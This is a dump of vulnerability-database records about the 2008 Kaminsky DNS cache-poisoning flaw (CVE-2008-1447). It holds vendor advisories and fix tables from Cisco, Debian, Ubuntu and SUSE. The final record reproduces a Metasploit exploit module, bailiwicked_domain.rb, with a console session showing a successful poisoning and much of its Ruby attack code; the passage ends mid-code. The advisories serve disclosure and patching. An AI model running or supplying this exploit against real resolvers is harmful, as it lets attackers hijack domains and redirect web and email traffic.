12.4(15)MD |\r\n|------------+-------------+-------------|\r\n| 12.4MR | 12.4(19)MR | 12.4(19)MR |\r\n|------------+-------------+-------------|\r\n| 12.4SW | Vulnerable; | |\r\n| | contact TAC | 
|\r\n|------------+-------------+-------------|\r\n| | 12.4(15)T6 | |\r\n| | | 12.4(20)T; |\r\n| 12.4T | 12.4(20)T; | Available |\r\n| | Available | on |\r\n| | on | 11-JUL-08 |\r\n| | 11-JUL-08 | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.4XA | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| 12.4XB | 12.4(2)XB10 | |\r\n|------------+-------------+-------------|\r\n| 12.4XC | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| | 12.4(4) | 12.4(20)T; |\r\n| | XD11; | Available |\r\n| 12.4XD | Available | on |\r\n| | on | 11-JUL-08 |\r\n| | 31-JUL-08 | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.4XE | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| 12.4XF | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.4XG | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.4XJ | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| 12.4XK | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.4XL | 12.4(15)XL2 | 12.4(15)XL2 |\r\n|------------+-------------+-------------|\r\n| 12.4XM | 12.4(15)XM1 | 12.4(15)XM1 |\r\n|------------+-------------+-------------|\r\n| 12.4XN | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| 12.4XQ | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| 12.4XT | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| 12.4XV | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| 12.4XW | 12.4(11)XW8 | 12.4(11)XW6 
|\r\n|------------+-------------+-------------|\r\n| 12.4XY | 12.4(15)XY3 | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.4XZ | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n+----------------------------------------+\r\n\r\nCisco Network Registrar\r\n+----------------------\r\n\r\n+---------------------------------------+\r\n| Affected | |\r\n| Release | First Fixed Release |\r\n| Train | |\r\n|--------------+------------------------|\r\n| 6.1.x | Contact TAC |\r\n|--------------+------------------------|\r\n| | 6.3.1.1 patch; |\r\n| 6.3.x | available mid-July |\r\n| | 2008 |\r\n|--------------+------------------------|\r\n| 7.0.x | 7.0.1; available in |\r\n| | mid-July 2008 |\r\n+---------------------------------------+\r\n\r\nCisco Network Registrar software is available for download at:\r\n\r\nhttp://www.cisco.com/pcgi-bin/Software/Tablebuild/tablebuild.pl/nr-eval\r\n\r\nCisco Application and Content Networking System\r\n+----------------------------------------------\r\n\r\nThis issue is fixed in version 5.5.11 of Cisco ACNS software. This\r\nrelease will be available for download from www.cisco.com in late July\r\n2008.\r\n\r\nCisco ACNS 5.5 software is available for download at:\r\n\r\nhttp://www.cisco.com/pcgi-bin/tablebuild.pl/acns55\r\n\r\nWorkarounds\r\n===========\r\n\r\nThere are no workarounds.\r\n\r\nAdditional information about identification and mitigation of attacks\r\nagainst DNS is in the Cisco Applied Intelligence white paper "DNS Best\r\nPractices, Network Protections, and Attack Identification," available at\r\nhttp://www.cisco.com/web/about/security/intelligence/dns-bcp.html.\r\n\r\nObtaining Fixed Software\r\n========================\r\n\r\nCisco has released free software updates that address these\r\nvulnerabilities. 
Prior to deploying software, customers should consult\r\ntheir maintenance provider or check the software for feature set\r\ncompatibility and known issues specific to their environment.\r\n\r\nCustomers may only install and expect support for the feature sets\r\nthey have purchased. By installing, downloading, accessing or\r\notherwise using such software upgrades, customers agree to be bound\r\nby the terms of Cisco's software license terms found at\r\nhttp://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,\r\nor as otherwise set forth at Cisco.com Downloads at\r\nhttp://www.cisco.com/public/sw-center/sw-usingswc.shtml.\r\n\r\nDo not contact psirt@cisco.com or security-alert@cisco.com for software\r\nupgrades.\r\n\r\nCustomers with Service Contracts\r\n+-------------------------------\r\n\r\nCustomers with contracts should obtain upgraded software through their\r\nregular update channels. For most customers, this means that upgrades\r\nshould be obtained through the Software Center on Cisco's worldwide\r\nwebsite at http://www.cisco.com.\r\n\r\nCustomers using Third Party Support Organizations\r\n+------------------------------------------------\r\n\r\nCustomers whose Cisco products are provided or maintained through prior\r\nor existing agreements with third-party support organizations, such\r\nas Cisco Partners, authorized resellers, or service providers should\r\ncontact that support organization for guidance and assistance with the\r\nappropriate course of action in regards to this advisory.\r\n\r\nThe effectiveness of any workaround or fix is dependent on specific\r\ncustomer situations, such as product mix, network topology, traffic\r\nbehavior, and organizational mission. 
Due to the variety of affected\r\nproducts and releases, customers should consult with their service\r\nprovider or support organization to ensure any applied workaround or fix\r\nis the most appropriate for use in the intended network before it is\r\ndeployed.\r\n\r\nCustomers without Service Contracts\r\n+----------------------------------\r\n\r\nCustomers who purchase direct from Cisco but do not hold a Cisco service\r\ncontract, and customers who purchase through third-party vendors but are\r\nunsuccessful in obtaining fixed software through their point of sale\r\nshould acquire upgrades by contacting the Cisco Technical Assistance\r\nCenter (TAC). TAC contacts are as follows.\r\n\r\n * +1 800 553 2447 (toll free from within North America)\r\n * +1 408 526 7209 (toll call from anywhere in the world)\r\n * e-mail: tac@cisco.com\r\n\r\nCustomers should have their product serial number available and be\r\nprepared to give the URL of this notice as evidence of entitlement to a\r\nfree upgrade. Free upgrades for non-contract customers must be requested\r\nthrough the TAC.\r\n\r\nRefer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml\r\nfor additional TAC contact information, including localized telephone\r\nnumbers, and instructions and e-mail addresses for use in various\r\nlanguages.\r\n\r\nExploitation and Public Announcements\r\n=====================================\r\n\r\nThe Cisco PSIRT is not aware of any public announcements or malicious\r\nuse of the vulnerability described in this advisory.\r\n\r\nAlthough DNS cache poisoning attacks are not new, security researcher\r\nDan Kaminsky of IOActive recently presented a technique that makes DNS\r\ncache poisoning attacks more likely to succeed. 
Cisco would like to\r\nthank Dan Kaminsky for notifying vendors about his findings.\r\n\r\nNote that vulnerability information for Cisco IOS Software is being\r\nprovided in this advisory outside of the announced publication schedule\r\nfor Cisco IOS Software described at http://www.cisco.com/go/psirt due to\r\nindustry-wide disclosure of the vulnerability.\r\n\r\nStatus of this Notice: FINAL\r\n============================\r\n\r\nTHIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY\r\nANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF\r\nMERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE\r\nINFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS\r\nAT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS\r\nDOCUMENT AT ANY TIME.\r\n\r\nA stand-alone copy or Paraphrase of the text of this document that omits\r\nthe distribution URL in the following section is an uncontrolled copy,\r\nand may lack important information or contain factual errors.\r\n\r\nDistribution\r\n============\r\n\r\nThis advisory is posted on Cisco's worldwide website at\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml\r\n\r\nIn addition to worldwide web posting, a text version of this notice is\r\nclear-signed with the Cisco PSIRT PGP key and is posted to the following\r\ne-mail and Usenet news recipients.\r\n\r\n * cust-security-announce@cisco.com\r\n * first-teams@first.org\r\n * bugtraq@securityfocus.com\r\n * vulnwatch@vulnwatch.org\r\n * cisco@spot.colorado.edu\r\n * cisco-nsp@puck.nether.net\r\n * full-disclosure@lists.grok.org.uk\r\n * comp.dcom.sys.cisco@newsgate.cisco.com\r\n\r\nFuture updates of this advisory, if any, will be placed on Cisco's\r\nworldwide website, but may or may not be actively announced on mailing\r\nlists or newsgroups. 
Users concerned about this problem are encouraged\r\nto check the above URL for any updates.\r\n\r\nRevision History\r\n================\r\n\r\n+-----------------------------------------------------------+\r\n| Revision 1.0 | 2008-July-08 | Initial public release |\r\n+-----------------------------------------------------------+\r\n\r\nCisco Security Procedures\r\n=========================\r\n\r\nComplete information on reporting security vulnerabilities in\r\nCisco products, obtaining assistance with security incidents, and\r\nregistering to receive security information from Cisco, is available\r\non Cisco's worldwide website at\r\nhttp://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.\r\nThis includes instructions for press inquiries regarding Cisco security\r\nnotices. All Cisco security advisories are available at\r\nhttp://www.cisco.com/go/psirt.\r\n\r\n+--------------------------------------------------------------------\r\nCopyright 2007-2008 Cisco Systems, Inc. 
All rights reserved.\r\n+--------------------------------------------------------------------\r\n\r\nUpdated: Jul 08, 2008 Document ID: 107064\r\n\r\n+--------------------------------------------------------------------\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niEYEARECAAYFAkhztUIACgkQ86n/Gc8U/uCAgACfVRRoJO4w4defnpwbNlfgBm4t\r\n2SMAnjKCKECHtsjN9umqqPrPd2DW4IcC\r\n=XGZw\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-07-12T00:00:00", "published": "2008-07-12T00:00:00", "id": "SECURITYVULNS:DOC:20146", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20146", "title": "Cisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1605-1 security@debian.org\r\nhttp://www.debian.org/security/ Florian Weimer\r\nJuly 08, 2008 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : glibc\r\nVulnerability : DNS cache poisoning\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2008-1447\r\nCERT advisory : VU#800113\r\n\r\n\r\nDan Kaminsky discovered that properties inherent to the DNS protocol\r\nlead to practical DNS spoofing and cache poisoning attacks. Among\r\nother things, successful attacks can lead to misdirected web traffic\r\nand email rerouting.\r\n\r\nAt this time, it is not possible to implement the recommended\r\ncountermeasures in the GNU libc stub resolver. The following\r\nworkarounds are available:\r\n\r\n1. Install a local BIND 9 resoler on the host, possibly in\r\nforward-only mode. 
BIND 9 will then use source port randomization\r\nwhen sending queries over the network. (Other caching resolvers can\r\nbe used instead.)\r\n\r\n2. Rely on IP address spoofing protection if available. Successful\r\nattacks must spoof the address of one of the resolvers, which may not\r\nbe possible if the network is guarded properly against IP spoofing\r\nattacks (both from internal and external sources).\r\n\r\nThis DSA will be updated when patches for hardening the stub resolver\r\nare available.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 (GNU/Linux)\r\n\r\niQEVAwUBSHOIFr97/wQC1SS+AQIscwf+KBKMT4hcpB5TCNE+0v1DNBHiQ4rh7ktz\r\nKiOyLWEJOaxOrpsR8siA6B6newiLe5KfwojDikqSCXbubTCeicj79HTCx5DzzhTm\r\naa3HePARxmtN1AuyFCebOfklibTtyY/gpwydCdAVBiV0+LmD+jXy9Jx4AfyuibXZ\r\nVaqkUTj5sUUQn5CacdI1zc1Ky1rzbzRBBoNJ1D1rRBU1wjoGsvVjBV9p24j/1E2c\r\nmYtbY3g1FKmhnOTLBac/AAW62ZQ44yf4QcGgwV8CULfi5c2QmGiRYZioWDVd0pfZ\r\nhr2h/Vmjs2qgf8B9FmYet0hEGm6SrEryT2ievlqXkpul0MYtHjJ5iw==\r\n=CMHb\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-07-12T00:00:00", "published": "2008-07-12T00:00:00", "id": "SECURITYVULNS:DOC:20145", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20145", "title": "[SECURITY] [DSA 1605-1] DNS vulnerability impact on the libc stub resolver", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "ubuntu": [{"lastseen": "2020-07-08T23:41:00", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dan Kaminsky discovered weaknesses in the DNS protocol as implemented \nby Dnsmasq. 
A remote attacker could exploit this to spoof DNS entries \nand poison DNS caches. Among other things, this could lead to \nmisdirected email and web traffic.", "edition": 5, "modified": "2008-07-22T00:00:00", "published": "2008-07-22T00:00:00", "id": "USN-627-1", "href": "https://ubuntu.com/security/notices/USN-627-1", "title": "Dnsmasq vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-07-09T00:23:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dan Kaminsky discovered weaknesses in the DNS protocol as implemented \nby Bind. A remote attacker could exploit this to spoof DNS entries and \npoison DNS caches. Among other things, this could lead to misdirected \nemail and web traffic.", "edition": 5, "modified": "2008-07-08T00:00:00", "published": "2008-07-08T00:00:00", "id": "USN-622-1", "href": "https://ubuntu.com/security/notices/USN-622-1", "title": "Bind vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "suse": [{"lastseen": "2016-09-04T11:48:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "The bind daemon is responsible for resolving hostnames to IP addresses and vice versa. The new version of bind uses a random transaction-ID (TRXID) and a random UDP source-port for DNS queries to address DNS cache poisoning attacks possible because of the \"birthday paradox\" and an attack discovered by Dan Kaminsky. Unfortunately we do not have details about Kaminsky's attack and have to trust the statement that a random UDP source-port is sufficient to stop it. DNS servers that do not support recursive queries or do not use a cache (authoritative only servers) are not vulnerable either. Update packages of bind9 for SLES8 will be available soon. The glibc stub resolver is known to be vulnerable too and we will publish updates as soon as possible. 
Note, a local attacker can always sniff DNS queries and generate spoofed responses easily. If you use the UDP source-port number of the DNS server in your firewall configuration, for example to let DNS queries through your packetfilter, then you have to take steps to adapt your filter rules to the new behavior of the DNS server.\n#### Solution\nTo protect your infrastructure from cache poisoning attacks you should provide two DNS servers. One that is authoritative only and accessible from the Internet to resolve queries for your local systems that are available over the Internet. The other system (caching) is not accessible over the Internet and can be used by internal clients to recursively look up names and addresses. But we encourage you to install the bind update as soon as possible too. If you use the latest update of pdns-recursor you are not vulnerable to this attack. For the glibc stub resolver bug you can install a local secure DNS forwarder on your machine or make a DNS forwarder available for a protected network.", "edition": 1, "modified": "2008-07-11T09:57:52", "published": "2008-07-11T09:57:52", "id": "SUSE-SA:2008:033", "href": "http://lists.opensuse.org/opensuse-security-announce/2008-07/msg00003.html", "title": "DNS cache poisoning in bind", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dnsmasq is lightweight, easy to configure DNS forwarder and DHCP server. It is designed to provide DNS and, optionally, DHCP, to a small network. It can serve the names of local machines which are not in the global DNS. The DHCP server integrates with the DNS server and allows machines with DHCP-allocated addresses to appear in the DNS with names configured either in each host or in a central configuration file. 
Dnsmasq supports static and dynamic DHCP leases and BOOTP for network booting of diskless machines. ", "modified": "2009-02-14T22:11:22", "published": "2009-02-14T22:11:22", "id": "FEDORA:EB89E20852E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: dnsmasq-2.45-1.fc9", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:07", "description": "", "published": "2008-07-24T00:00:00", "type": "packetstorm", "title": "bailiwicked_domain.rb.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "id": "PACKETSTORM:68473", "href": "https://packetstormsecurity.com/files/68473/bailiwicked_domain.rb.txt.html", "sourceData": "` ____ ____ __ __ \n/ \\ / \\ | | | | \n----====####/ /\\__\\##/ /\\ \\##| |##| |####====---- \n| | | |__| | | | | | \n| | ___ | __ | | | | | \n------======######\\ \\/ /#| |##| |#| |##| |######======------ \n\\____/ |__| |__| \\______/ \n \nComputer Academic Underground \nhttp://www.caughq.org \nExploit Code \n \n===============/======================================================== \nExploit ID: CAU-EX-2008-0003 \nRelease Date: 2008.07.23 \nTitle: bailiwicked_domain.rb \nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains \nTested: BIND 9.4.1-9.4.2 \nAttributes: Remote, Poison, Resolver, Metasploit \nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt \nAuthor/Email: I)ruid <druid (@) caughq.org> \nH D Moore <hdm (@) metasploit.com> \n===============/======================================================== \n \nDescription \n=========== \n \nThis exploit targets a fairly ubiquitous flaw in DNS implementations \nwhich allow the insertion of malicious DNS records into the cache of the \ntarget nameserver. This exploit caches a single malicious nameserver \nentry into the target nameserver which replaces the legitimate \nnameservers for the target domain. 
By causing the target nameserver to \nquery for random hostnames at the target domain, the attacker can spoof \na response to the target server including an answer for the query, an \nauthority server record, and an additional record for that server, \ncausing target nameserver to insert the additional record into the \ncache. This insertion completely replaces the original nameserver \nrecords for the target domain. \n \n \nExample \n======= \n \n# /msf3/msfconsole \n \n## ### ## ## \n## ## #### ###### #### ##### ##### ## #### ###### \n####### ## ## ## ## ## ## ## ## ## ## ### ## \n####### ###### ## ##### #### ## ## ## ## ## ## ## \n## # ## ## ## ## ## ## ##### ## ## ## ## ## \n## ## #### ### ##### ##### ## #### #### #### ### \n## \n \n \n=[ msf v3.2-release \n+ -- --=[ 298 exploits - 124 payloads \n+ -- --=[ 18 encoders - 6 nops \n=[ 73 aux \n \nmsf > use auxiliary/spoof/dns/bailiwicked_domain \nmsf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D \nRHOST => A.B.C.D \nmsf auxiliary(bailiwicked_domain) > set DOMAIN example.com \nDOMAIN => example.com \nmsf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com \nNEWDNS => dns01.metasploit.com \nmsf auxiliary(bailiwicked_domain) > set SRCPORT 0 \nSRCPORT => 0 \nmsf auxiliary(bailiwicked_domain) > check \n[*] Using the Metasploit service to verify exploitability... \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] FAIL: This server uses static source ports and is vulnerable to poisoning \nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D \n[*] exec: dig +short -t ns example.com @A.B.C.D \n \nb.iana-servers.net. \na.iana-servers.net. \n \nmsf auxiliary(bailiwicked_domain) > run \n[*] Switching to target port 50391 based on Metasploit service \n[*] Targeting nameserver A.B.C.D for injection of example.com. 
nameservers as dns01.metasploit.com \n[*] Querying recon nameserver for example.com.'s nameservers... \n[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net. \n[*] Querying recon nameserver for address of b.iana-servers.net.... \n[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236 \n[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com.... \n[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net. \n[*] Querying recon nameserver for address of a.iana-servers.net.... \n[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43 \n[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com.... \n[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391... \n[*] Sent 1000 queries and 20000 spoofed responses... \n[*] Sent 2000 queries and 40000 spoofed responses... \n[*] Sent 3000 queries and 60000 spoofed responses... \n[*] Sent 4000 queries and 80000 spoofed responses... \n[*] Sent 5000 queries and 100000 spoofed responses... \n[*] Sent 6000 queries and 120000 spoofed responses... \n[*] Sent 7000 queries and 140000 spoofed responses... \n[*] Sent 8000 queries and 160000 spoofed responses... \n[*] Sent 9000 queries and 180000 spoofed responses... \n[*] Sent 10000 queries and 200000 spoofed responses... \n[*] Sent 11000 queries and 220000 spoofed responses... \n[*] Sent 12000 queries and 240000 spoofed responses... \n[*] Sent 13000 queries and 260000 spoofed responses... \n[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com \n[*] Auxiliary module execution completed \n \nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D \n[*] exec: dig +short -t ns example.com @A.B.C.D \n \ndns01.metasploit.com. 
\n \n \nCredits \n======= \n \nDan Kaminsky is credited with originally discovering this vulnerability. \n \n \nReferences \n========== \n \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 \nhttp://www.kb.cert.org/vuls/id/800113 \n \n \nMetasploit \n========== \n \nrequire 'msf/core' \nrequire 'net/dns' \nrequire 'scruby' \nrequire 'resolv' \n \nmodule Msf \n \nclass Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary \n \ninclude Exploit::Remote::Ip \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DNS BailiWicked Domain Attack', \n'Description' => %q{ \nThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \nDan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target \ndomains nameserver entries in a vulnerable DNS cache server. This attack works \nby sending random hostname queries to the target DNS server coupled with spoofed \nreplies to those queries from the authoritative nameservers for that domain. \nEventually, a guessed ID will match, the spoofed packet will get accepted, and \nthe nameserver entries for the target domain will be replaced by the server \nspecified in the NEWDNS option of this exploit. 
\n}, \n'Author' => [ 'I)ruid', 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 5590 $', \n'References' => \n[ \n[ 'CVE', '2008-1447' ], \n[ 'US-CERT-VU', '8000113' ], \n[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ], \n], \n'DisclosureDate' => 'Jul 21 2008' \n)) \n \nregister_options( \n[ \nOptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]), \nOptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), \nOptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]), \nOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), \nOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), \nOptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]), \n], self.class) \n \nend \n \ndef auxiliary_commands \nreturn { \"check\" => \"Determine if the specified DNS server (RHOST) is vulnerable\" } \nend \n \ndef cmd_check(*args) \ntarg = args[0] || rhost() \nif(not (targ and targ.length > 0)) \nprint_status(\"usage: check [dns-server]\") \nreturn \nend \n \nprint_status(\"Using the Metasploit service to verify exploitability...\") \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => targ, \n'PeerPort' => 53 \n) \n \nrandom = false \nports = [] \nlport = nil \n \n1.upto(5) do |i| \n \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \n \nprint_status(\" >> ADDRESS: #{t_addr} PORT: #{t_port}\") \nt_port = t_port.to_i \nif(lport and lport != t_port) \nrandom = true \nend \nlport = 
t_port \nports << t_port \nend \nend \nend \nend \n \nsrv_sock.close \n \nif(ports.length < 5) \nprint_status(\"UNKNOWN: This server did not reply to our vulnerability check requests\") \nreturn \nend \n \nif(random) \nprint_status(\"PASS: This server does not use a static source port. Ports: #{ports.join(\", \")}\") \nprint_status(\" This server may still be exploitable, but not by this tool.\") \nelse \nprint_status(\"FAIL: This server uses static source ports and is vulnerable to poisoning\") \nend \nend \n \ndef run \ntarget = rhost() \nsource = Rex::Socket.source_address(target) \nsport = datastore['SRCPORT'] \ndomain = datastore['DOMAIN'] + '.' \nnewdns = datastore['NEWDNS'] \nrecons = datastore['RECONS'] \nxids = datastore['XIDS'].to_i \nnewttl = datastore['TTL'].to_i \nxidbase = rand(20001) + 20000 \n \naddress = Rex::Text.rand_text(4).unpack(\"C4\").join(\".\") \n \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => target, \n'PeerPort' => 53 \n) \n \n# Get the source port via the metasploit service if it's not set \nif sport.to_i == 0 \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \nsport = t_port.to_i \n \nprint_status(\"Switching to target port #{sport} based on Metasploit service\") \nif target != t_addr \nprint_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\") \nend \nend \nend \nend \nend \n \n# Verify its not already poisoned \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(domain, Resolv::DNS::Resource::IN::NS) \nquery.rd = 0 \n \nbegin \ncached = 
false \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \n \nif((name.to_s + \".\") == domain and data.name.to_s == newdns) \nt = Time.now + ttl \nprint_status(\"Failure: This domain is already using #{newdns} as a nameserver\") \nprint_status(\" Cache entry expires on #{t.to_s}\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \nend \n \nend \nend until not cached \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \n \n \nres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver \n \nprint_status \"Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}\" \n \n# Look up the nameservers for the domain \nprint_status \"Querying recon nameserver for #{domain}'s nameservers...\" \nanswer0 = res0.send(domain, Net::DNS::NS) \n#print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\" \n \nbarbs = [] # storage for nameservers \nanswer0.answer.each do |rr0| \nprint_status \" Got an #{rr0.type} record: #{rr0.inspect}\" \nif rr0.type == 'NS' \nprint_status \" Querying recon nameserver for address of #{rr0.nsdname}...\" \nanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname \n#print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\" \nanswer1.answer.each do |rr1| \nprint_status \" Got an #{rr1.type} record: #{rr1.inspect}\" \nres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \nprint_status \" Checking Authoritativeness: Querying #{rr1.address} for #{domain}...\" \nanswer2 = res2.send(domain) \nif answer2 and answer2.header.auth? 
